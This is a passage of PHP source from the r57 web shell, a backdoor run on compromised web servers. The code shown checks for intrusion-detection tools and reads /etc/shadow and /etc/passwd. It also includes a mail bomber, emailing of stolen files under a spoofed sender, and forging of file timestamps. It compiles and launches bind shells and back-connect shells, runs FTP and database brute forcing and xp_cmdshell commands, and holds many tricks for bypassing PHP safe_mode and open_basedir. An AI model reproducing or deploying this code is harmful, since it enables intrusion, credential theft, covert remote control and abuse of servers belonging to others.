                            $ust.= "snort,";
                        }
                        if (which('ossec')) {
                            $ust.= "ossec,";
                        }
                        if (which('lidsadm')) {
                            $ust.= "lidsadm,";
                        }
                        if (which('tcplodg')) {
                            $ust.= "tcplodg,";
                        }
                        if (which('tripwire')) {
                            $ust.= "tripwire,";
                        }
                        if (which('sxid')) {
                            $ust.= "sxid,";
                        }
                        if (which('logcheck')) {
                            $ust.= "logcheck,";
                        }
                        if (which('logwatch')) {
                            $ust.= "logwatch,";
                        }
                    }
                    if (@function_exists('apache_get_modules') && @in_array('mod_security', apache_get_modules())) {
                        $ust.= "mod_security,";
                    }
                    if ($ust) {
                        echo "<br>" . ws(2) . $lang[$language . '_text138'] . ": <font color=red>$ust</font>";
                    }
                    echo "<br>" . ws(2) . "</b>";
                    echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?phpinfo title=\"" . $lang[$language . '_text46'] . "\"><b>phpinfo</b></a> " . $rb;
                    echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?phpini title=\"" . $lang[$language . '_text47'] . "\"><b>php.ini</b></a> " . $rb;
                    echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?cpu title=\"" . $lang[$language . '_text50'] . "\"><b>cpu</b></a> " . $rb;
                    echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?mem title=\"" . $lang[$language . '_text51'] . "\"><b>mem</b></a> " . $rb;
                    if (!$unix) {
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?systeminfo title=\"" . $lang[$language . '_text50'] . "\"><b>systeminfo</b></a> " . $rb;
                    } else {
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?syslog title=\"View syslog.conf\"><b>syslog</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?resolv title=\"View resolv\"><b>resolv</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?hosts title=\"View hosts\"><b>hosts</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?shadow title=\"View shadow\"><b>shadow</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?passwd title=\"" . $lang[$language . '_text95'] . "\"><b>passwd</b></a> " . $rb;
                    }
                    echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?tmp title=\"" . $lang[$language . '_text48'] . "\"><b>tmp</b></a> " . $rb;
                    echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?delete title=\"" . $lang[$language . '_text49'] . "\"><b>delete</b></a> " . $rb;
                    if ($unix && !$safe_mode) {
                        echo "<br>" . ws(2) . "</b>";
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?procinfo title=\"View procinfo\"><b>procinfo</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?version title=\"View proc version\"><b>version</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?free title=\"View mem free\"><b>free</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?vmstat title=\"View vmstat\"><b>vmstat</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?lspci title=\"View lspci\"><b>lspci</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?lsdev title=\"View lsdev\"><b>lsdev</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?interrupts title=\"View interrupts\"><b>interrupts</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?realise1 title=\"View realise1\"><b>realise1</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?realise2 title=\"View realise2\"><b>realise2</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> " . $rb;
                        echo "<br>" . ws(2) . "</b>";
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?w title=\"View w\"><b>w</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?who title=\"View who\"><b>who</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?uptime title=\"View uptime\"><b>uptime</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?last title=\"View last -n 10\"><b>last</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?psaux title=\"View ps -aux\"><b>ps aux</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?service title=\"View service\"><b>service</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?netstat title=\"View netstat -a\"><b>netstat</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?fstab title=\"View fstab\"><b>fstab</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> " . $rb;
                        echo ws(2) . $lb . " <a href=" . $_SERVER['PHP_SELF'] . "?df title=\"View df -h\"><b>df -h</b></a> " . $rb;
                    }
                    echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>
<tr><td align=right width=100>';
                    echo $font;
                    if ($unix) {
                        echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
                        echo "</td><td>";
                        echo "<font face=Verdana size=-2 color=red><b>";
                        echo ((!empty($uname)) ? (ws(3) . @substr($uname, 0, 120) . "<br>") : (ws(3) . @substr(@php_uname(), 0, 120) . "<br>"));
                        echo ws(3) . $sysctl . "<br>";
                        echo ws(3) . ex('echo $OSTYPE') . "<br>";
                        echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
                        if (!empty($id)) {
                            echo ws(3) . $id . "<br>";
                        } else if (@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) {
                            $euserinfo = @posix_getpwuid(@posix_geteuid());
                            $egroupinfo = @posix_getgrgid(@posix_getegid());
                            echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )<br>';
                        } else echo ws(3) . "user=" . @get_current_user() . " uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>";
                        echo ws(3) . $dir;
                        echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
                        echo "</b></font>";
                    } else {
                        echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
                        echo "</td><td>";
                        echo "<font face=Verdana size=-2 color=red><b>";
                        echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
                        echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
                        echo ws(3) . @getenv("USERNAME") . "<br>";
                        echo ws(3) . $dir;
                        echo "<br></font>";
                    }
                    echo "</font>";
                    echo "</td></tr></table>";
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail") {
                        $res = mail($_POST['to'], $_POST['subj'], $_POST['text'], "From: " . $_POST['from'] . "\r\n");
                        err(6 + $res);
                        $_POST['cmd'] = "";
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_file" && !empty($_POST['loc_file'])) {
                        if ($file = @fopen($_POST['loc_file'], "r")) {
                            $filedump = @fread($file, @filesize($_POST['loc_file']));
                            @fclose($file);
                        } else if ($file = readzlib($_POST['loc_file'])) {
                            $filedump = $file;
                        } else {
                            err(1, $_POST['loc_file']);
                            $_POST['cmd'] = "";
                        }
                        if (isset($_POST['cmd'])) {
                            $filename = @basename($_POST['loc_file']);
                            $content_encoding = $mime_type = '';
                            compress($filename, $filedump, $_POST['compress']);
                            $attach = array("name" => $filename, "type" => $mime_type, "content" => $filedump);
                            if (empty($_POST['subj'])) {
                                $_POST['subj'] = 'file from r57';
                            }
                            if (empty($_POST['from'])) {
                                $_POST['from'] = 'billy@microsoft.com';
                            }
                            $res = mailattach($_POST['to'], $_POST['from'], $_POST['subj'], $attach);
                            err(6 + $res);
                            $_POST['cmd'] = "";
                        }
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) {
                        for ($h = 1;$h <= $_POST['mail_flood'];$h++) {
                            $res = mail($_POST['to'], $_POST['subj'], $_POST['text'] . str_repeat(" ", 1024 * $_POST['mail_size']), "From: " . $_POST['from'] . "\r\n");
                        }
                        err(6 + $res);
                        $_POST['cmd'] = "";
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") {
                        $_POST['cmd'] = 'find ' . $_POST['s_dir'] . ' -name \'' . $_POST['s_mask'] . '\' | xargs grep -E \'' . $_POST['s_text'] . '\'';
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "ch_") {
                        switch ($_POST['what']) {
                            case 'own':
                                @chown($_POST['param1'], $_POST['param2']);
                            break;
                            case 'grp':
                                @chgrp($_POST['param1'], $_POST['param2']);
                            break;
                            case 'mod':
                                @chmod($_POST['param1'], intval($_POST['param2'], 8));
                            break;
                        }
                        $_POST['cmd'] = "";
                    }
                    if (!empty($_POST['cmd']) && $_POST['cmd'] == "mk") {
                        switch ($_POST['what']) {
                            case 'file':
                                if ($_POST['action'] == "create") {
                                    if (@file_exists($_POST['mk_name']) || !$file = @fopen($_POST['mk_name'], "w")) {
                                        err(2, $_POST['mk_name']);
                                        $_POST['cmd'] = "";
                                    } else {
                                        @fclose($file);
                                        $_POST['e_name'] = $_POST['mk_name'];
                                        $_POST['cmd'] = "edit_file";
                                        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text61'] . "</b></font></div></td></tr></table>";
                                    }
                                } else if ($_POST['action'] == "delete") {
                                    if (unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text63'] . "</b></font></div></td></tr></table>";
                                    $_POST['cmd'] = "";
                                }
                                break;
                            case 'dir':
                                if ($_POST['action'] == "create") {
                                    if (@mkdir($_POST['mk_name'])) {
                                        $_POST['cmd'] = "";
                                        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text62'] . "</b></font></div></td></tr></table>";
                                    } else {
                                        err(2, $_POST['mk_name']);
                                        $_POST['cmd'] = "";
                                    }
                                } else if ($_POST['action'] == "delete") {
                                    if (@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text64'] . "</b></font></div></td></tr></table>";
                                    $_POST['cmd'] = "";
                                }
                                break;
                            }
                        }
                        if (!empty($_POST['cmd']) && $_POST['cmd'] == "touch") {
                            if (!$_POST['file_name_r']) {
                                $datar = $_POST['day'] . " " . $_POST['month'] . " " . $_POST['year'] . " " . $_POST['chasi'] . " hours " . $_POST['minutes'] . " minutes " . $_POST['second'] . " seconds";
                                $datar = @strtotime($datar);
                                @touch($_POST['file_name'], $datar, $datar);
                            } else {
                                @touch($_POST['file_name'], @filemtime($_POST['file_name_r']), @filemtime($_POST['file_name_r']));
                            }
                            $_POST['cmd'] = "";
                        }
                        if (!empty($_POST['cmd']) && $_POST['cmd'] == "edit_file" && !empty($_POST['e_name'])) {
                            if (!$file = @fopen($_POST['e_name'], "r+")) {
                                $filedump = @fread($file, @filesize($_POST['e_name']));
                                @fclose($file);
                                $only_read = 1;
                            }
                            if ($file = @fopen($_POST['e_name'], "r")) {
                                $filedump = @fread($file, @filesize($_POST['e_name']));
                                @fclose($file);
                            } else if ($file = readzlib($_POST['e_name'])) {
                                $filedump = $file;
                                $only_read = 1;
                            } else {
                                err(1, $_POST['e_name']);
                                $_POST['cmd'] = "";
                            }
                            if (isset($_POST['cmd'])) {
                                echo $table_up3;
                                echo $font;
                                echo "<form name=save_file method=post>";
                                echo ws(3) . "<b>" . $_POST['e_name'] . "</b>";
                                echo "<div align=center><textarea name=e_text cols=121 rows=24>";
                                echo @htmlspecialchars($filedump);
                                echo "</textarea>";
                                echo "<input type=hidden name=e_name value=" . $_POST['e_name'] . ">";
                                echo "<input type=hidden name=dir value=" . $dir . ">";
                                echo "<input type=hidden name=cmd value=save_file>";
                                echo (!empty($only_read) ? ("<br><br>" . $lang[$language . '_text44']) : ("<br><br><input type=submit name=submit value=\" " . $lang[$language . '_butt10'] . " \">"));
                                echo "</div>";
                                echo "</font>";
                                echo "</form>";
                                echo "</td></tr></table>";
                                exit();
                            }
                        }
                        if (!empty($_POST['cmd']) && $_POST['cmd'] == "save_file") {
                            $mtime = @filemtime($_POST['e_name']);
                            if ((!$file = @fopen($_POST['e_name'], "w")) && (!function_exists('file_put_contents'))) {
                                err(0, $_POST['e_name']);
                            } else {
                                if ($unix) $_POST['e_text'] = @str_replace("\r\n", "\n", $_POST['e_text']);
                                @fwrite($file, $_POST['e_text']) or @fputs($file, $_POST['e_text']) or @file_put_contents($_POST['e_name'], $_POST['e_text']);
                                @touch($_POST['e_name'], $mtime, $mtime);
                                $_POST['cmd'] = "";
                                echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text45'] . "</b></font></div></td></tr></table>";
                            }
                        }
                        if (!empty($_POST['proxy_port']) && ($_POST['use'] == "Perl")) {
                            cf("/tmp/prxpl", $prx_pl);
                            $p2 = which("perl");
                            $blah = ex($p2 . " /tmp/prxpl " . $_POST['proxy_port'] . " &");
                            $_POST['cmd'] = "ps -aux | grep prxpl";
                        }
                        if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "C")) {
                            cf("/tmp/bd.c", $port_bind_bd_c);
                            $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
                            @unlink("/tmp/bd.c");
                            $blah = ex("/tmp/bd " . $_POST['port'] . " " . $_POST['bind_pass'] . " &");
                            $_POST['cmd'] = "ps -aux | grep bd";
                        }
                        if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "Perl")) {
                            cf("/tmp/bdpl", $port_bind_bd_pl);
                            $p2 = which("perl");
                            $blah = ex($p2 . " /tmp/bdpl " . $_POST['port'] . " &");
                            $_POST['cmd'] = "ps -aux | grep bdpl";
                        }
                        if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "Perl")) {
                            cf("/tmp/back", $back_connect);
                            $p2 = which("perl");
                            $blah = ex($p2 . " /tmp/back " . $_POST['ip'] . " " . $_POST['port'] . " &");
                            $_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
                        }
                        if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "C")) {
                            cf("/tmp/back.c", $back_connect_c);
                            $blah = ex("gcc -o /tmp/backc /tmp/back.c");
                            @unlink("/tmp/back.c");
                            $blah = ex("/tmp/backc " . $_POST['ip'] . " " . $_POST['port'] . " &");
                            $_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
                        }
                        if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "Perl")) {
                            cf("/tmp/dp", $datapipe_pl);
                            $p2 = which("perl");
                            $blah = ex($p2 . " /tmp/dp " . $_POST['local_port'] . " " . $_POST['remote_host'] . " " . $_POST['remote_port'] . " &");
                            $_POST['cmd'] = "ps -aux | grep dp";
                        }
                        if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "C")) {
                            cf("/tmp/dpc.c", $datapipe_c);
                            $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
                            @unlink("/tmp/dpc.c");
                            $blah = ex("/tmp/dpc " . $_POST['local_port'] . " " . $_POST['remote_port'] . " " . $_POST['remote_host'] . " &");
                            $_POST['cmd'] = "ps -aux | grep dpc";
                        }
                        if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) {
                            $_POST['cmd'] = $aliases[$_POST['alias']];
                        }
                        for ($upl = 0;$upl <= 16;$upl++) {
                            if (!empty($HTTP_POST_FILES['userfile' . $upl]['name'])) {
                                if (!empty($_POST['new_name']) && ($upl == 0)) {
                                    $nfn = $_POST['new_name'];
                                } else {
                                    $nfn = $HTTP_POST_FILES['userfile' . $upl]['name'];
                                }
                                @move_uploaded_file($HTTP_POST_FILES['userfile' . $upl]['tmp_name'], $_POST['dir'] . "/" . $nfn) or print ("<font color=red face=Fixedsys><div align=center>Error uploading file " . $HTTP_POST_FILES['userfile' . $upl]['name'] . "</div></font>");
                            }
                        }
                        if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) {
                            switch ($_POST['with']) {
                                case 'fopen':
                                    $datafile = @implode("", @file($_POST['rem_file']));
                                    if ($datafile) {
                                        $w_file = @fopen($_POST['loc_file'], "wb") or @function_exists('file_put_contents') or err(0);
                                        if ($w_file) {
                                            @fwrite($w_file, $datafile) or @fputs($w_file, $datafile) or @file_put_contents($_POST['loc_file'], $datafile);
                                            @fclose($w_file);
                                        }
                                    }
                                    $_POST['cmd'] = '';
                                break;
                                case 'wget':
                                    $_POST['cmd'] = which('wget') . " " . $_POST['rem_file'] . " -O " . $_POST['loc_file'] . "";
                                break;
                                case 'fetch':
                                    $_POST['cmd'] = which('fetch') . " -o " . $_POST['loc_file'] . " -p " . $_POST['rem_file'] . "";
                                break;
                                case 'lynx':
                                    $_POST['cmd'] = which('lynx') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
                                break;
                                case 'links':
                                    $_POST['cmd'] = which('links') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
                                break;
                                case 'GET':
                                    $_POST['cmd'] = which('GET') . " " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
                                break;
                                case 'curl':
                                    $_POST['cmd'] = which('curl') . " " . $_POST['rem_file'] . " -o " . $_POST['loc_file'] . "";
                                break;
                            }
                        }
                        if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_file_up") || ($_POST['cmd'] == "ftp_file_down"))) {
                            list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']);
                            if (empty($ftp_port)) {
                                $ftp_port = 21;
                            }
                            $connection = @ftp_connect($ftp_server, $ftp_port, 10);
                            if (!$connection) {
                                err(3);
                            } else {
                                if (!@ftp_login($connection, $_POST['ftp_login'], $_POST['ftp_password'])) {
                                    err(4);
                                } else {
                                    if ($_POST['cmd'] == "ftp_file_down") {
                                        if (chop($_POST['loc_file']) == $dir) {
                                            $_POST['loc_file'] = $dir . ((!$unix) ? ('\\') : ('/')) . basename($_POST['ftp_file']);
                                        }
                                        @ftp_get($connection, $_POST['loc_file'], $_POST['ftp_file'], $_POST['mode']);
                                    }
                                    if ($_POST['cmd'] == "ftp_file_up") {
                                        @ftp_put($connection, $_POST['ftp_file'], $_POST['loc_file'], $_POST['mode']);
                                    }
                                }
                            }
                            @ftp_close($connection);
                            $_POST['cmd'] = "";
                        }
                        if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_brute") || ($_POST['cmd'] == "db_brute"))) {
                            if ($_POST['cmd'] == "ftp_brute") {
                                list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']);
                                if (empty($ftp_port)) {
                                    $ftp_port = 21;
                                }
                                $connection = @ftp_connect($ftp_server, $ftp_port, 10);
                            } else if ($_POST['cmd'] == "db_brute") {
                                $connection = 1;
                            }
                            if (!$connection) {
                                err(3);
                                $_POST['cmd'] = "";
                            } else if (($_POST['brute_method'] == 'passwd') && (!$users = get_users('/etc/passwd'))) {
                                echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>" . $lang[$language . '_text96'] . "</b></div></font></td></tr></table>";
                                $_POST['cmd'] = "";
                            } else if (($_POST['brute_method'] == 'dic') && (!$users = get_users($_POST['dictionary']))) {
                                echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";
                                $_POST['cmd'] = "";
                            }
                            if ($_POST['cmd'] == "ftp_brute") {
                                @ftp_close($connection);
                            }
                        }
                        echo $table_up3;
                        if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) {
                            $_POST['cmd'] = (!$unix) ? ("dir") : ("ls -lia");
                        } else if (empty($_POST['cmd']) && ($safe_mode || $open_basedir)) {
                            $_POST['cmd'] = "safe_dir";
                        }
                        echo $font . $lang[$language . '_text1'] . ": <b>" . $_POST['cmd'] . "</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
                        if ($safe_mode || $open_basedir) {
                            switch ($_POST['cmd']) {
                                case 'safe_dir':
                                    $d = @dir($dir);
                                    if ($d) {
                                        while (false !== ($file = $d->read())) {
                                            if ($file == "." || $file == "..") continue;
                                            @clearstatcache();
                                            @list($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
                                            if (!$unix) {
                                                echo date("d.m.Y H:i", $mtime);
                                                if (@is_dir($file)) echo "  <DIR> ";
                                                else printf("% 7s ", $size);
                                            } else {
                                                if (@function_exists('posix_getpwuid')) {
                                                    $owner = @posix_getpwuid($uid);
                                                    $grgid = @posix_getgrgid($gid);
                                                } else {
                                                    $owner['name'] = $grgid['name'] = '';
                                                }
                                                echo $inode . " ";
                                                echo perms(@fileperms($file));
                                                @printf("% 4d % 9s % 9s %7s ", $nlink, $owner['name'], $grgid['name'], $size);
                                                echo date("d.m.Y H:i ", $mtime);
                                            }
                                            echo "$file\n";
                                        }
                                        $d->close();
                                    } else if (@function_exists('glob')) {
                                        function eh($errno, $errstr, $errfile, $errline) {
                                            global $D, $c, $i;
                                            preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
                                            if ($o) {
                                                $D[$c] = $o[2];
                                                $c++;
                                            }
                                        }
                                        $error_reporting = @ini_get('error_reporting');
                                        error_reporting(E_WARNING);
                                        @ini_set("display_errors", 1);
                                        $root = "/";
                                        if ($dir) $root = $dir;
                                        $c = 0;
                                        $D = array();
                                        @set_error_handler("eh");
                                        $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
                                        for ($i = 0;$i < strlen($chars);$i++) {
                                            $path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}";
                                            $prevD = $D[count($D) - 1];
                                            @glob($path . "*");
                                            if ($D[count($D) - 1] != $prevD) {
                                                for ($j = 0;$j < strlen($chars);$j++) {
                                                    $path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}{$chars[$j]}";
                                                    $prevD2 = $D[count($D) - 1];
                                                    @glob($path . "*");
                                                    if ($D[count($D) - 1] != $prevD2) {
                                                        for ($p = 0;$p < strlen($chars);$p++) {
                                                            $path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}{$chars[$j]}{$chars[$p]}";
                                                            $prevD3 = $D[count($D) - 1];
                                                            @glob($path . "*");
                                                            if ($D[count($D) - 1] != $prevD3) {
                                                                for ($r = 0;$r < strlen($chars);$r++) {
                                                                    $path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
                                                                    @glob($path . "*");
                                                                }
                                                            }
                                                        }
                                                    }
                                                }
                                            }
                                        }
                                        $D = array_unique($D);
                                        foreach ($D as $item) echo htmlspecialchars("{$item}") . "\r\n";
                                        error_reporting($error_reporting);
                                    } else echo $lang[$language . '_text29'];
                                    break;
                                case 'test1':
                                    $ci = @curl_init("file://" . $_POST['test1_file']);
                                    $cf = @curl_exec($ci);
                                    echo htmlspecialchars($cf);
                                    break;
                                case 'test2':
                                    @include ($_POST['test2_file']);
                                    break;
                                case 'test3':
                                    if (empty($_POST['test3_port'])) {
                                        $_POST['test3_port'] = "3306";
                                    }
                                    $db = @mysql_connect('localhost:' . $_POST['test3_port'], $_POST['test3_ml'], $_POST['test3_mp']);
                                    if ($db) {
                                        if (@mysql_select_db($_POST['test3_md'], $db)) {
                                            @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
                                            @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
                                            @mysql_query("LOAD DATA INFILE \"" . $_POST['test3_file'] . "\" INTO TABLE temp_r57_table");
                                            $r = @mysql_query("SELECT * FROM temp_r57_table");
                                            while (($r_sql = @mysql_fetch_array($r))) {
                                                echo @htmlspecialchars($r_sql[0]) . "\r\n";
                                            }
                                            @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
                                        } else echo "[-] ERROR! Can't select database";
                                        @mysql_close($db);
                                    } else echo "[-] ERROR! Can't connect to mysql server";
                                    break;
                                case 'test4':
                                    if (empty($_POST['test4_port'])) {
                                        $_POST['test4_port'] = "1433";
                                    }
                                    $db = @mssql_connect('localhost,' . $_POST['test4_port'], $_POST['test4_ml'], $_POST['test4_mp']);
                                    if ($db) {
                                        if (@mssql_select_db($_POST['test4_md'], $db)) {
                                            @mssql_query("drop table r57_temp_table", $db);
                                            @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)", $db);
                                            @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '" . $_POST['test4_file'] . "'", $db);
                                            $res = mssql_query("select * from r57_temp_table", $db);
                                            while (($row = @mssql_fetch_row($res))) {
                                                echo htmlspecialchars($row[0]) . "\r\n";
                                            }
                                            @mssql_query("drop table r57_temp_table", $db);
                                        } else echo "[-] ERROR! Can't select database";
                                        @mssql_close($db);
                                    } else echo "[-] ERROR! Can't connect to MSSQL server";
                                    break;
                                case 'test5':
                                    $temp = tempnam($dir, "fname");
                                    if (@file_exists($temp)) @unlink($temp);
                                    $extra = "-C " . $_POST['test5_file'] . " -X $temp";
                                    @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
                                    $str = moreread($temp);
                                    echo htmlspecialchars($str);
                                    @unlink($temp);
                                    break;
                                case 'test6':
                                    $stream = @imap_open('/etc/passwd', "", "");
                                    $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
                                    for ($i = 0;$i < count($dir_list);$i++) echo htmlspecialchars($dir_list[$i]) . "\r\n";
                                    @imap_close($stream);
                                    break;
                                case 'test7':
                                    $stream = @imap_open($_POST['test7_file'], "", "");
                                    $str = @imap_body($stream, 1);
                                    echo htmlspecialchars($str);
                                    @imap_close($stream);
                                    break;
                                case 'test8':
                                    $temp = @tempnam($_POST['test8_file2'], "copytemp");
                                    $str = readzlib($_POST['test8_file1'], $temp);
                                    echo htmlspecialchars($str);
                                    @unlink($temp);
                                    break;
                                case 'test9':
                                    @ini_restore("safe_mode");
                                    @ini_restore("open_basedir");
                                    $str = moreread($_POST['test9_file']);
                                    echo htmlspecialchars($str);
                                    break;
                                case 'test10':
                                    @ob_clean();
                                    $error_reporting = @ini_get('error_reporting');
                                    error_reporting(E_ALL ^ E_NOTICE);
                                    @ini_set("display_errors", 1);
                                    $str = fopen($_POST['test10_file'], "r");
                                    while (!feof($str)) {
                                        print htmlspecialchars(fgets($str));
                                    }
                                    fclose($str);
                                    error_reporting($error_reporting);
                                    break;
                                case 'test11':
                                    @ob_clean();
                                    $temp = 'zip://' . $_POST['test11_file'];
                                    $str = moreread($temp);
                                    echo htmlspecialchars($str);
                                    break;
                                case 'test12':
                                    @ob_clean();
                                    $temp = 'compress.bzip2://' . $_POST['test12_file'];
                                    $str = moreread($temp);
                                    echo htmlspecialchars($str);
                                    break;
                                case 'test13':
                                    @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../" . $_POST['test13_file2']);
                                    echo $lang[$language . '_text61'];
                                    break;
                                case 'test14':
                                    @session_save_path($_POST['test14_file2'] . "\0;/tmp");
                                    @session_start();
                                    @$_SESSION[php] = $_POST['test14_file1'];
